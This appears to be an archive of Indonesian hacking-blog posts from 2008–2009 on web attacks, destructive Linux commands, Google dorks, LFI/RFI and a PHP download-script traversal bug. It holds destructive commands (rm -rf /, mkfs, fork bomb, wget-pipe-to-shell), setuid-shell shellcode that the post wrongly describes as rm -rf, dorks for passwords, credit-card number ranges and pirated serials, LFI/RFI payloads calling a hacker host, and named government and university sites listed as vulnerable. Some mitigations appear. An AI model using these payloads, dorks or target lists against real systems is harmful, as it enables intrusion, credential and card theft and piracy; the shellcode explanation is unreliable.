October 29, 2009

Simple Basic Web Attack

Filed under: Bugs, PHP&MYSQL

halo kawan-kawan semuanya, ini sebenernya gue pesembahkan buat devilzc0de yang sedang mengalami guncangan dari pihak asink(cie,cie bahasanya), maksudnya ini gue tulis ketika devilzc0de sedang mengalami suspend diforumnya, semoga ini cepat berlalu dan Devilzc0de cepet exist kembali, terima kasih buat temen2 yang udeh mau bantu berdirinya Devilzc0de sampe saat ini, w cinta loh semuanya, kita adalah familly.
ok, kawan2 langsung saja dari pada tunggu lama, tr malah kesel lagi lama2 w curhat…

oh yah, kenapa gue bisa pilih judul kaya diatas, karena ada buku yang judulnya web attack, nah disni gue cuma mempersimpel jah, bhkan ini basic sekali buat para pemula,bagi yang sudah bisa silahkan tidak usah dibaca tutorial cupu w ok, bagi yang mau baca silahkan aja.

dalam tutorial kali ini w akan membahas beberapa serangan yang sering dilakukan oleh para attacker web atau dengan kata lain tester web:

1.XSS (Cross site scripting)
2.basic SQL injection
3.SQL injection for ASP
4.bypass login
5.File Inclusion (RFI/LFI)
6.RCE (Remote Command Execution)

(more…)

January 17, 2009

Virus Shortcut

Filed under: Kacau, Bugs

Kenapa kok dinamakan virus shortcut, karena virus ini membuat shortcut pada setiap folder dengan menyamai folder yg ada pada drive di PC. Virus shortcut sendiri di buat dengan menggunakan VB, yang bikin kesel lagi tuh virus tuh kalo di bongkar ada file Thumb.db bisa di buka di notepad pada line teratas ada link ke www.muslimah.or.id. Langsung aja untuk membersihkan virus ini bisa download Tools buatan saya di link ini.

December 2, 2008

7 Perintah Mematikan di Linux

Filed under: Linux, Bugs

 

Linux terkenal karena aspek keamanan penggunaan. Virus yang berteman baik dengan Windows misalnya, harus mencari cara yang sangat rumit untuk bisa menembus Linux.

Meski demikian, dunia yang fana ini (hehehe…) merupakan tempat bagi beragam orang dengan berbagai sifat. Para penjahat dan psikopat bisa saja menyamar di berbagai forum dan mailing list, dan alih-alih memberikan solusi justru bisa membuat anda menderita. Adakalanya perintah-perintah berbahaya di Linux dijadikan sebagai lelucon untuk menggoda (meski berbagai distro memiliki etika dan guiding principle yang melarang lelucon berbahaya) meski ada juga yang memang berniat menjebak orang lain.

Berikut adalah 7 perintah berbahaya yang disarikan dari 7 Deadly Command :

  1. Perintah rm -rf /
    Perintah ini akan menghapus seluruh isi folder / (root folder atau root directory). Root folder memang dilindungi oleh hak akses user root, tapi akan sangat berbahaya jika perintah diatas dieksekusi saat kita berada dalam hak akses root. Itulah mengapa sangat dianjurkan untuk menggunakan hak akses user biasa untuk kegiatan sehari-hari.Perintah diatas juga tetap berbahaya jika dijalankan oleh user biasa yang dapat merusak isi folder miliknya sendiri
  2. Perintah menggunakan bilangan hexa

    3. char esp[] __attribute__ ((section(”.text”))) /* e.s.p
    release */
    = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
    “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
    “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
    “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
    “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
    “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
    “\x6e\x2f\x73\x68\x00\x2d\x63\x00″
    “cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;”;

    Perintah diatas sama dengan perintah pada nomor 1 hanya saja ditulis dalam bilangan hexa. Jika dieksekusi, sama halnya menghapus seluruh isi folder (rm -rf /). Karena ditulis dalam bilangan hexa, perintah ini bisa juga menjebak user Linux yang berpengalaman

  3. Perintah mkfs.ext3 /dev/sda
    Perintah ini sama halnya melakukan perintah format pada partisi yang ditunjuk.
  4. Perintah forkbomb :(){:|:&};:
    Perintah ini akan memerintahkan sistem untuk mengeksekusi berbagai proses sampai hang. Biasanya akan mengakibatkan hilangnya data karena komputer terpaksa harus dimatikan secara paksa.
  5. Perintah apapun > /dev
    Perintah ini akan menimpa sistem file device yang ditunjuk dan pada akhirnya bisa menyebabkan hilangnya data yang dimounting pada folder /dev (folder /dev biasa digunakan untuk menempatkan keterangan hardware dan harddisk)
  6. Perintah untuk eksekusi file shell tertentu
    Perintah wget http://alamat-url-yangtidak-jelas -O- | sh akan memerintahkan Linux untuk langsung menjalankan file sh yang ditunjuk. File sh adalah file eksekusi di Linux, sama halnya file .exe. Jangan sekali-kali melakukan perintah diatas untuk file sh yang tidak jelas sumber dan peruntukannya.
  7. Perintah memindahkan home folder ke /dev/null
    mv /home/home-directory/* /dev/null
    Perintah ini akan memindahkan seluruh data di home folder ke file null (file yang sebenarnya tidak ada). File yang dipindahkan akan hilang selamanya tanpa ada backup…

Selain 7 perintah diatas, ada beberapa perintah lainnya yang mungkin belum dimasukkan disini. Prinsip hati-hati dalam menjalankan suatu perintah merupakan hal mutlak yang harus selalu diingat oleh pengguna Linux.

 Sumber : www.vavai.com

July 10, 2008

Senjata Para Hacker

Filed under: Bugs

salah satu senjata hacker adalah google.. ya google.. dengan google kamu bisa dapet banyak informasi menarik..
ex : nomor kartu kredit, password, software, mp3 dan lain2..

metode 1
coba masukkan keyword berikut pada gogole:
intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurlasslist.txt
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"

Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999
"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

metode 2
masukkan string berikut pada google untuk mencari file mp3

intitle:index.of mp3

kamu tinggal masukin aja nama lagu/penyayi/artis/judul:
example : intitle:index.of mp3 jackson

kamu juga bisa mengubah untuk mencari file2 lain misalnya yg berektensi zip..
example : intitle:index.of *.zip namafile atau example : intitle:index.of zip namafile

metode 3
masukkan string berikut pada google search:
inurl:microsoft filetype:iso
dan terserah dengan apa yang ingin kamu cari, ex. microsoft ,adobe, iso , zip etc…
"# -FrontPage-" inurl:service.pwd
ini buat ngedapetin frontpage password !!

"AutoCreate=TRUE password=*"
silahkan coba ini juga..

"http://*:*@www" domainname
dan ini..
porno juga bisa..
"http://*:*@www" bangbus or "http://*:*@www"bangbus

atau..
"http://bob:bob@www"

"sets mode: +k"
yang ini buat ngedapetin password channel IRC.

allinurl: admin mdb
buat ngedapetin admin database!

allinurl:auth_user_file.txt
password n user yang disimpang dalam bentuk txt

intitle:"Index of" config.php
user password database..

eggdrop filetype:user user
konfigurasi eggdrop.

intitle:index.of.etc
untuk mengakses etc directory..

nyari serian number windows xp
masukkan string berikut pada google bar - "Windows XP Professional" 94FBR
94FBR adalah kode …
atau untuk mendapatkan serial winzip 8.1 - "Winzip 8.1" 94FBR

May 26, 2008

about LFI/RFI

Filed under: Bugs

apaan sih LFI (local file inclusion) itu??
LFI adalah suatu bug dimana kita bisa menginclude kan file (file yang berada didalam server yg bersangkutan)
ke page yang vulnerable (vulnerable LFI maksudnya).
sedangkan RFI (remote file inclusion) mirip dengan LFI, hanya saja kita bisa mengincludekan file diluar server yg bersangkutan.
(tentu saja mengekploitasi RFI akan lebih mudah & menyenangkan dibandingkan mengeksploitasi LFI).

fungsi-fungsi php yang digunakan dalam LFI/RFI:
include()
include_once()
require()
require_once()

contoh code:
1. vulnerable LFI dan RFI ==> konfigurasi yg dibutuhkan allow_url_include = on; allow_url_fopen = on
lfi.php
<?
$page = $_GET[page];
include($page);
?>

eksploitasi LFI
misalkan kita memanggil url
http://localhost/lfi.php?page=../../../../../../../../etc/passwd
atau
http://localhost/lfi.php?page=c:/boot.ini
jadi $page = $_GET[page] = ../../../../../../../../etc/passwd
dan file /etc/passwd akan dieksekusi.
karena /etc/passwd bukanlah code-code php maka isi dari /etc/passwd akan ditampilkan ke browser.

eksploitasi RFI
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.hacker.com/hack.txt
dan isi dari hack.txt adalah <? echo “dihack oleh hacker”; ?>

maka page tadi akan menampilkan tulisan “dihack oleh hacker”.
ini terjadi karena isi dari hack.txt dieksekusi oleh server.

2. vulnerable LFI saja
lfi.php
<?
$page = $_GET[page];
include(”./”.$page);
?>

misalkan kita memanggil url
http://localhost/lfi.php?page=../../../../../../../../etc/passwd
maka $page = $_GET[page] = ./../../../../../../../../etc/passwd
dan isi file /etc/passwd akan ditampilkan ke browser

misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.hacker.com/hack.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.hacker.com/hack.txt);
==> maka ./http://www.hacker.com/hack.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.hacker.com/hack.txt tidak ada dalam server tersebut.

3. lain-lain ===> settingan yg dibutuhkan: allow_url_include = on; allow_url_fopen = on; magic_quotes_gpc = off
<?
$page = $_GET[page];
include($page.”.php”);
?>

eksploitasi LFI:
http://localhost/lfi.php?page=../../../../../../../../etc/passwd%00
maka $page = $_GET[page] = ../../../../../../../../etc/passwd%00.php
sedangkan fungsi dari %00 (teknik null injection) adalah untuk menghilangkan karakter sesudah %00 (tentunya %00 ikut hilang juga).
jadi $page = $_GET[page] = ../../../../../../../../etc/passwd ==> tanpa embel-embel .php
untuk melakukan teknik ini, maka settingan magic_quotes_gpc harus off, jika magic_quotesnya on maka %00 akan diganti oleh server menjadi \0 sehingga teknik null injection menjadi gagal.

exploitasi RFI:
http://localhost/lfi.php?page=http://www.hacker.com/hack.txt?
maka $page = $_GET[page] = http://www.hacker.com/hack.txt?.php
nah .php oleh server akan diabaikan.

Cara mencegah LFI/RFI
1.dengan code php
misalkan
<?
$page = $_GET[page];
switch($page)
{
case “1.php”:
include(”1.php”);
break;
case “2.php”:
include(”2.php”);
break;
default:
include(”1.php”);
}
?>
hal ini akan membuat file yang bisa di-includekan hanya 1.php dan 2.php
2.settingan server
misalkan
allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc= on
open_basedir = “/www/html/serverku”

kesimpulan:
1. LFI dan RFI sebenernya adalah dua buah bug yang sangat mirip, hanya bedanya jika LFI mengambil file dari dalam server, maka RFI mengambil fil dari luar server

2. untuk RFI agar bisa dieksploitasi maka dibutuhkan agar settingan pada server : allow_url_include = on dan allow_url_fopen = on

3.null byte injection bisa dicegah dengan mengaktifkan magic_quotes

4. LFI dan RFI bisa dicegah dengan pengkodean dan pen-settingan server yang baik

PHP download script vulnerability

Filed under: Bugs

php download script vulnerability, itulah judul artikel saya yang dipublish di jasakom pada 18 januari 2008

http://www.jasakom.com/index.php?categoryid=9&p2_articleid=595
berikut ini isinya

PHP download script vulnerability
Oleh tomplixsee
Published: Januari 18, 2008

Sebenarnya saya bingung mau memberi judul apa pada artikel ini. Maaf bila judulnya agak kurang pas dengan isi artikelnya
PHP adalah suatu bahasa pemrograman web yang cukup sakti yang kehandalannya tidak diragukan lagi. Tapi,adanya kesalahan dalam logika pemrograman php akan bisa berakibat fatal.

Salah satu contohnya adalah :
//download.php
header( “Content-Type: application/octet-stream” );
header( “Content-Length: ” . filesize($_GET[’file’] ) );
header( “Content-Disposition: inline; filename=\”$_GET[file]\”");
readfile($_GET[’file’] );
?>

Kode php diatas memiliki kelemahan yang fatal, dimana variabel “file” sama sekali tidak difilter, sehingga hacker akan bisa mendownload file apapun yang ada di server tersebut. Misalkan saja sang hacker mengakses alamat http://korban/download.php?file=../../../../../../etc/passwd maka file /etc/passwd milik server akan dikirimkan ke hacker.
Atau jika hacker mengakses alamat http://korban/download.php?file=download.php maka hacker akan mendapatkan source code dari file download.php.
Sedangkan untuk mencari korban bisa kita gunakan google, misalkan dengan syntax inurl:”download.php?file=” , atau inurl:”download.php?file=*.pdf” -intext:”download.php?file=*.pdf” atau yang lainnya.

Beberapa contoh situs yang vulnerable adalah:

http://www.mpbp.gov.my/download.php?file=download.php
http://elearning.mmu.edu.my/download.php?file=download.php
http://www.utem.edu.my/fkp/latihanIndustri/download.php?file=../../../../../../etc/passwd
http://www.moe.gov.my/pipp/download.php?filename=/../../../../../../etc/passwd

Adapun sedikit hal untuk pencegahan adalah:

1. lakukan pemfilteran terhadap inputan yang diterima dari user.
Misalkan pemfilteran terhadap karakter “../”, “%00”, atau type file yang boleh didownload.
2. lakukan pembatasan file access
3. berikan batasan, file di folder mana saja yang boleh didownload atau tidak
4. untuk menghindari googling, hindari penamaan script dengan nama “download.php” dan nama variabel dengan nama “file”.

 

 Sumber : http://www.cupu-zone.com/wordpress/?p=12